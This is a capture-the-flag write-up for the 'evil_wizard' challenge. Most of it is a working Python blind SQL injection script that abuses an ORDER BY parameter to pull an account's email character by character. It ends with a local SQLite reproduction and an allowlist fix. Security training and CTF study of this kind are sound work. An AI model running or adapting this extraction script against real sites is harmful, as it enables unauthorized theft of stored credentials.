
59th post.

 

 

1. Code analysis

The difference from the hell_fire challenge is that sleep() and benchmark() cannot be used.

 

 

2. Exploit

I did not use sleep() or benchmark() in the hell_fire challenge either, so only a small change to the code I used there is enough to solve this one.

 

 

import requests
import string
sess = requests.session()
headers = {'Cookie': 'PHPSESSID=YOURSESSID'}
admin_password = ''
ascii_printable = string.printable
#print(ascii_printable)

## get password length
for i in range(100):
    url = f"https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)={i},id='rubiya'"
    res = sess.get(url, headers=headers)
    if('<th>id</th><th>email</th><th>score</th><tr><td>rubiya<' in res.text):
        print('Password length is ', i)
        password_length = i
        break

## get password
for i in range(1,password_length+1):
    for j in ascii_printable:
        url = f"https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(substr(email,{i},1))={ord(j)},id='rubiya'"
        res = sess.get(url, headers=headers)
        if('<th>id</th><th>email</th><th>score</th><tr><td>rubiya<' in res.text):
            admin_password = admin_password+j
            print(admin_password)
            break

print("Admin Password is " + admin_password)
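
The script works because the order parameter is evaluated as an SQL expression, so the row order itself answers a true/false question. The following is an added example, not code from the challenge or from this post: it reproduces that behaviour locally and shows an allowlist fix. It assumes the server concatenates the parameter into ORDER BY (the challenge source is not shown here), uses an in-memory SQLite database in place of MySQL, and the table name prob, the sample rows and the function names are made up for illustration.

```python
import sqlite3

# Constructed sample rows; the columns mirror the id/email/score header checked above.
ROWS = [("admin", "admin@example.test", 50), ("rubiya", "rubiya@example.test", 100)]

# Allowlist: request value -> fixed SQL fragment, so user text never reaches the query.
SORTABLE = {"id": "id", "email": "email", "score": "score"}


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE prob (id TEXT, email TEXT, score INTEGER)")  # hypothetical table
    db.executemany("INSERT INTO prob VALUES (?, ?, ?)", ROWS)
    return db


def list_unsafe(db, order):
    # Assumed vulnerable shape: the order parameter is concatenated into ORDER BY,
    # so any expression is evaluated per row and the row order reveals its result.
    return [row[0] for row in db.execute(f"SELECT id FROM prob ORDER BY {order}")]


def list_safe(db, order):
    # Only known column names are accepted; everything else is rejected outright.
    column = SORTABLE.get(order)
    if column is None:
        raise ValueError("unsupported sort key")
    return [row[0] for row in db.execute(f"SELECT id FROM prob ORDER BY {column}")]


if __name__ == "__main__":
    db = make_db()
    for order in ("length(email)=18,id='rubiya'", "length(email)=5,id='rubiya'"):
        print("unsafe:", order, "->", list_unsafe(db, order))
        try:
            list_safe(db, order)
        except ValueError as exc:
            print("safe:  ", order, "->", exc)
    print("safe:   score ->", list_safe(db, "score"))
```

With the allowlist in place, the response no longer depends on any expression supplied in the request, so there is no ordering difference left to observe.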

 
